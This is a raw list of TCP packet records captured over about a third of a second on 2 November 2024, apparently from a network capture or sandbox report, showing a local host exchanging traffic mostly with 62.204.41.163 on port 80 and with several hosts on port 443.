Nov 2, 2024 17:56:55.010515928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010528088 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010552883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010565996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010634899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010648012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010658979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010673046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010685921 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010695934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010731936 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010902882 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010915041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010926008 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010938883 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010951996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.010951996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.010993004 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011004925 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011166096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011178017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011188984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011200905 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011210918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011220932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011244059 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011290073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011470079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011482000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011493921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011507034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011508942 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011518955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011528969 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011553049 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011574030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011719942 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011729956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.011763096 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.011774063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.019731045 CET	443	49963	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:55.033143044 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.033243895 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.033808947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033819914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033826113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033833027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033895016 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.033895969 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033938885 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.033941984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033953905 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.033988953 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.034049034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.034061909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.034073114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.034095049 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.034138918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.034847975 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.034868002 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.034908056 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.034914970 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.034939051 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.034960985 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.042838097 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.042911053 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.044321060 CET	443	49963	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:55.044378996 CET	49963	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:55.045387983 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.045408010 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.045490026 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.045499086 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.045598030 CET	49963	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:55.045614958 CET	443	49963	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:55.045619965 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.071933985 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.071995974 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.072227955 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.072417974 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.072434902 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.086122990 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.086395025 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.086410999 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.087392092 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.087449074 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.087950945 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.088007927 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.088376999 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.088383913 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.093905926 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.093959093 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.094058990 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.094333887 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.094333887 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.094362974 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.094377041 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.096189976 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:55.096230984 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:55.096301079 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:55.096494913 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:55.096524000 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:55.097706079 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.097728968 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.097795010 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.097953081 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.097964048 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.121254921 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.121521950 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.121592999 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.121639967 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.121654034 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.121666908 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.121671915 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.128521919 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.128582954 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.128611088 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.128654003 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.128931046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.128942013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.128950119 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.128956079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.128972054 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.128983021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129002094 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129038095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129050016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129060984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129081964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129112959 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129168034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129206896 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129240990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129255056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129281044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129292011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129336119 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129378080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129442930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129487991 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129498959 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129532099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129549026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129610062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129657984 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129659891 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129671097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129693031 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129705906 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129786968 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129828930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129841089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129867077 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129898071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.129959106 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129971981 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129983902 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.129996061 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130017996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130233049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.130249977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.130261898 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130284071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130304098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.130310059 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130338907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.130373955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.130381107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.130413055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.153203964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153240919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153254986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153284073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.153309107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.153338909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153351068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153362036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153388977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.153409958 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.153508902 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153520107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.153549910 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.154874086 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.154901028 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.154959917 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.154973984 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.154987097 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.155041933 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.155380964 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.155464888 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.159585953 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.159624100 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.159677029 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.159687042 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.159718037 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.159785032 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.165524960 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.165548086 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.165597916 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.165618896 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.165642023 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.165666103 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.166189909 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.166254044 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.166266918 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.166313887 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.198822021 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.198836088 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.198898077 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.198930979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.198935986 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.199003935 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.199270964 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.199292898 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.248315096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248361111 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248373032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248392105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248392105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248414993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248495102 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248507977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248519897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248533964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248543978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248558998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248596907 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248707056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248719931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248750925 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248761892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248828888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248843908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.248871088 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.248882055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249054909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249074936 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249087095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249098063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249110937 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249129057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249186993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249201059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249239922 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249330997 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249341965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249353886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249381065 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249406099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249459982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249497890 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249510050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249540091 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249563932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249646902 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249659061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249669075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.249687910 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.249711037 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.259183884 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.259629011 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.259681940 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.260432959 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.260446072 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.272350073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272361040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272371054 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272402048 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272413015 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272428989 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272460938 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272478104 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272490025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272501945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272532940 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272550106 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272653103 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272702932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272716045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272732019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272743940 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272768974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.272783995 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.272864103 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.276896000 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.276931047 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.277030945 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.277030945 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.277054071 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.277168036 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.279858112 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.279876947 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.279943943 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.279952049 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.279980898 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.280003071 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.317385912 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.317409992 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.317652941 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.317852020 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.317866087 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.318016052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.318052053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.318067074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.318084002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.318099976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.318145037 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.320727110 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.320769072 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.320823908 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.320914030 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.321058035 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.321204901 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.321219921 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.367417097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367439032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367449045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367492914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.367513895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367516994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.367552996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.367645025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367685080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367686033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.367697954 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367727995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.367863894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367942095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367955923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.367986917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368010044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368099928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368113041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368125916 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368139029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368151903 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368191957 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368321896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368331909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368369102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368423939 CET	80	49933	62.204.41.163	192.168.2.7
